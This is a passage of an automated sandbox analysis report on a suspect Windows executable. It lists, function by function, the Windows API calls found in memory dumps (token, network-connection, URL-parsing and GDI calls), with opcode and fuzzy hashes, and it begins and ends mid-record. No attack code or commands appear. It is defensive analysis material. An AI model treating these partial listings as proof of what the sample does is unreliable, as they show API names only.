                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2710830443-0
                                                                                                                                                • Opcode ID: db7da109d7d4073431fd3f56c9c6c765040940980c894459acec21da27cdddb2
                                                                                                                                                • Instruction ID: e0469c0acad6397cbd98ac743fbf0bf852d2c446e38640c296484e932ac6b361
                                                                                                                                                • Opcode Fuzzy Hash: db7da109d7d4073431fd3f56c9c6c765040940980c894459acec21da27cdddb2
                                                                                                                                                • Instruction Fuzzy Hash: 70E06D71611224BBD7205F63AC0DEEB3E6CEB83FA1F104015F109D10809AA08844C6B0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00229639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00229693
                                                                                                                                                  • Part of subcall function 00229639: SelectObject.GDI32(?,00000000), ref: 002296A2
                                                                                                                                                  • Part of subcall function 00229639: BeginPath.GDI32(?), ref: 002296B9
                                                                                                                                                  • Part of subcall function 00229639: SelectObject.GDI32(?,00000000), ref: 002296E2
                                                                                                                                                • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 002A8887
                                                                                                                                                • LineTo.GDI32(?,?,?), ref: 002A8894
                                                                                                                                                • EndPath.GDI32(?), ref: 002A88A4
                                                                                                                                                • StrokePath.GDI32(?), ref: 002A88B2
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1539411459-0
                                                                                                                                                • Opcode ID: 9ff9dc3af0a0451be90c3fc35ee1900a17c76122d06aa5793bbf5f8e52af2286
                                                                                                                                                • Instruction ID: 0ca67af6e67df3d4525cbe64481d454bc40dc61bf5f3dcc853598acf05656f56
                                                                                                                                                • Opcode Fuzzy Hash: 9ff9dc3af0a0451be90c3fc35ee1900a17c76122d06aa5793bbf5f8e52af2286
                                                                                                                                                • Instruction Fuzzy Hash: 2EF03A36055299BBDB125F94BC0DFCE3A59AF06310F548000FA11650E2CF795561CFA9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Color$ModeObjectStockText
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4037423528-0
                                                                                                                                                • Opcode ID: a41f488b54878628067af8e209a1d74fd6bc14605d1cd73bea3a9e1c29525f72
                                                                                                                                                • Instruction ID: 29392e2ffa6e30d6fd419b284e4e668d3e40446c834ca1df97475f3033ee5ae5
                                                                                                                                                • Opcode Fuzzy Hash: a41f488b54878628067af8e209a1d74fd6bc14605d1cd73bea3a9e1c29525f72
                                                                                                                                                • Instruction Fuzzy Hash: C0E06D31244280ABDB215F74BC0DBE83F60EB13336F248219F6FA581E1CB7246949B10
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetCurrentThread.KERNEL32(00000028,00000000,?,00000000,00271089,?,?,?,002711D9), ref: 00271634
                                                                                                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,002711D9), ref: 0027163B
                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,002711D9), ref: 00271648
                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,002711D9), ref: 0027164F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CurrentOpenProcessThreadToken
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3974789173-0
                                                                                                                                                • Opcode ID: a06dcd641581b9d5678093020d52b9b46879f30bb5c2dc13f193401b28dba1a3
                                                                                                                                                • Instruction ID: a3f47065ecc10556b1d8b1ebbbf243ee6a27c4a0420533b336d9271dc871fbc4
                                                                                                                                                • Opcode Fuzzy Hash: a06dcd641581b9d5678093020d52b9b46879f30bb5c2dc13f193401b28dba1a3
                                                                                                                                                • Instruction Fuzzy Hash: 85E08631601221DBD7201FA4BD0DB473B7CAF46791F248848F745C9080DE344550C750
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetDesktopWindow.USER32 ref: 0026D858
                                                                                                                                                • GetDC.USER32(00000000), ref: 0026D862
                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0026D882
                                                                                                                                                • ReleaseDC.USER32(?), ref: 0026D8A3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2889604237-0
                                                                                                                                                • Opcode ID: d2568f800c817743f2c49863fa790cb1e53d77a3160b920179b858817506811a
                                                                                                                                                • Instruction ID: 9a4ad128913ea096098d1a23f71dbe83bec56bb42e5e5ef5b8053bacadd2a8c0
                                                                                                                                                • Opcode Fuzzy Hash: d2568f800c817743f2c49863fa790cb1e53d77a3160b920179b858817506811a
                                                                                                                                                • Instruction Fuzzy Hash: DEE01AB4810204EFCB419FA0E80C66DBBF5FB49710F208049E816E7360CB788952AF40
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetDesktopWindow.USER32 ref: 0026D86C
                                                                                                                                                • GetDC.USER32(00000000), ref: 0026D876
                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0026D882
                                                                                                                                                • ReleaseDC.USER32(?), ref: 0026D8A3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2889604237-0
                                                                                                                                                • Opcode ID: b7bffb8014a5001b017f421375d96555c00b170823e83da1b4be381922457499
                                                                                                                                                • Instruction ID: c1bb98e2b451ce756b70a050111000364f7dfba54ba894d34888b975f30f35f5
                                                                                                                                                • Opcode Fuzzy Hash: b7bffb8014a5001b017f421375d96555c00b170823e83da1b4be381922457499
                                                                                                                                                • Instruction Fuzzy Hash: 82E01A74810204EFCB419FA0E80C66DBBF5BB48710B208049E916E7360CB3899119F40
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000003.756895707.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002AB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_3_29d0000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: $ZL
                                                                                                                                                • API String ID: 0-3552672294
                                                                                                                                                • Opcode ID: 5f4b0bf46cdb33aff3f6cf388ae02dd567b21fd811a3edf0408685ce73b227fd
                                                                                                                                                • Instruction ID: 2acf8e04cd07f2dc7f640216b09b89c1114f87f9ccff9e2963db8eac741ef1ef
                                                                                                                                                • Opcode Fuzzy Hash: 5f4b0bf46cdb33aff3f6cf388ae02dd567b21fd811a3edf0408685ce73b227fd
                                                                                                                                                • Instruction Fuzzy Hash: 2D81BC71900209AFDF229FA4CD89FEE7BB9EF04708F14403AF914A21A0DB718944CFA4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00217620: _wcslen.LIBCMT ref: 00217625
                                                                                                                                                • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00284ED4
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Connection_wcslen
                                                                                                                                                • String ID: *$LPT
                                                                                                                                                • API String ID: 1725874428-3443410124
                                                                                                                                                • Opcode ID: eb06bfc2452f63b63e8bfbe8a7977748846b4023fdcc62977f3fdcff45e0f012
                                                                                                                                                • Instruction ID: 115cbfbd91a2dc3774f32ad1eea7dc25c5652b9176d981bdf36bd5ef2e69de49
                                                                                                                                                • Opcode Fuzzy Hash: eb06bfc2452f63b63e8bfbe8a7977748846b4023fdcc62977f3fdcff45e0f012
                                                                                                                                                • Instruction Fuzzy Hash: 12917179A112069FCB14EF54C484EA9BBF1BF58304F14809DE90A5F7A2C771ED95CB90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • __startOneArgErrorHandling.LIBCMT ref: 0023E30D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorHandling__start
                                                                                                                                                • String ID: pow
                                                                                                                                                • API String ID: 3213639722-2276729525
                                                                                                                                                • Opcode ID: c0bfcab42c868d04d89ce8eaff850452e4a82930aa0c116f7fb6aec99e8752c0
                                                                                                                                                • Instruction ID: 1a89ae4386f1f12b5f9c97c964d39cb9d408c8fa48fb2aed909ce2929dfdb984
                                                                                                                                                • Opcode Fuzzy Hash: c0bfcab42c868d04d89ce8eaff850452e4a82930aa0c116f7fb6aec99e8752c0
                                                                                                                                                • Instruction Fuzzy Hash: 33514DA1E3C203D6CF197F24D9453BA3BA4EF40740F354A99E4B5422E9DB348CB99A46
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CharUpperBuffW.USER32(0026569E,00000000), ref: 002978DD
                                                                                                                                                  • Part of subcall function 00216B57: _wcslen.LIBCMT ref: 00216B6A
                                                                                                                                                • CharUpperBuffW.USER32(0026569E,00000000), ref: 0029783B
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: BuffCharUpper$_wcslen
                                                                                                                                                • String ID: <s-
                                                                                                                                                • API String ID: 3544283678-2482877350
                                                                                                                                                • Opcode ID: 9433d1fa7676b39a07b57ec44bb49a74b693b79c40143dd54c707da78c703fea
                                                                                                                                                • Instruction ID: 13b679b5ceff4d30093409969121c356a92fc524aca00d95ea87dc1f22c39d1c
                                                                                                                                                • Opcode Fuzzy Hash: 9433d1fa7676b39a07b57ec44bb49a74b693b79c40143dd54c707da78c703fea
                                                                                                                                                • Instruction Fuzzy Hash: 6E614C72934119AACF04EFE4CC95DFDB3B8FF24700B544126E542A7191EF70AAA5DBA0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: #
                                                                                                                                                • API String ID: 0-1885708031
                                                                                                                                                • Opcode ID: 318336bfacb49c9122bce901c70db5181374641478d0158f94c9768680cf3417
                                                                                                                                                • Instruction ID: a7b9dc70bc3c7eefad5e783c49af0ea6cbb24ba07e0eb4a2a5d9e837508ef0b8
                                                                                                                                                • Opcode Fuzzy Hash: 318336bfacb49c9122bce901c70db5181374641478d0158f94c9768680cf3417
                                                                                                                                                • Instruction Fuzzy Hash: 55517838520203EFDF15DF68D041AFABBA8EF25310F254015EC929B2C0D6309DA2DBA0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • Sleep.KERNEL32(00000000), ref: 0022F2A2
                                                                                                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 0022F2BB
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: GlobalMemorySleepStatus
                                                                                                                                                • String ID: @
                                                                                                                                                • API String ID: 2783356886-2766056989
                                                                                                                                                • Opcode ID: fce487ff10e368480a6ba6c85e53d55e97f90960c64e97cb544d69c59a618c32
                                                                                                                                                • Instruction ID: 7b4a8fa14cf451162002f107dc870614437be7047fc9b8d967700ce3e4cb6792
                                                                                                                                                • Opcode Fuzzy Hash: fce487ff10e368480a6ba6c85e53d55e97f90960c64e97cb544d69c59a618c32
                                                                                                                                                • Instruction Fuzzy Hash: EF5134714187449BD320AF10E88ABAFBBF8FB95300F91885DF199421A5EB318579CB66
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: BuffCharUpper_wcslen
                                                                                                                                                • String ID: CALLARGARRAY
                                                                                                                                                • API String ID: 157775604-1150593374
                                                                                                                                                • Opcode ID: 512393ed4142a8ab546c73610226c208bf7285f67acfa8be78dd83e487bd9e32
                                                                                                                                                • Instruction ID: 46d13a8614d1e4b70fec1be97051303b6dc93f0b4fcbd63d775a5173d55fa312
                                                                                                                                                • Opcode Fuzzy Hash: 512393ed4142a8ab546c73610226c208bf7285f67acfa8be78dd83e487bd9e32
                                                                                                                                                • Instruction Fuzzy Hash: 3741AE71A2021A9FCF15DFA8C8859EEBBF5FF59320F108069E505A7251EB709DA1CF90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • _wcslen.LIBCMT ref: 0028D130
                                                                                                                                                • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0028D13A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CrackInternet_wcslen
                                                                                                                                                • String ID: |
                                                                                                                                                • API String ID: 596671847-2343686810
                                                                                                                                                • Opcode ID: 7d48d1c3ee618d4ed50fe369dcebb51037bf7cbbbf243c0e235adbf59b621ec5
                                                                                                                                                • Instruction ID: 04888f2f5b196ccb783be25881505da79e6657b1ce60cf47f0888a93fa324b13
                                                                                                                                                • Opcode Fuzzy Hash: 7d48d1c3ee618d4ed50fe369dcebb51037bf7cbbbf243c0e235adbf59b621ec5
                                                                                                                                                • Instruction Fuzzy Hash: 63311B75D21109ABCF15EFA4CC89EEE7FB9FF14300F100119E819A61A5DB31A966DF50
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • DestroyWindow.USER32 ref: 002A3621
                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 002A365C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$DestroyMove
                                                                                                                                                • String ID: static
                                                                                                                                                • API String ID: 2139405536-2160076837
                                                                                                                                                • Opcode ID: af012bddeb747de0d5520dbe328774c80f555d478aae99747ee29fa8f51cbca8
                                                                                                                                                • Instruction ID: 9d65892481c90921ba6381abed4eaab83eb1627e6dbf20c54046d0b24ffeb790
                                                                                                                                                • Opcode Fuzzy Hash: af012bddeb747de0d5520dbe328774c80f555d478aae99747ee29fa8f51cbca8
                                                                                                                                                • Instruction Fuzzy Hash: C8318C71520205ABDB10DF68DC80EFB73ADFF89724F108619F8A597290DA31ADA19B64
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 002A461F
                                                                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002A4634
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
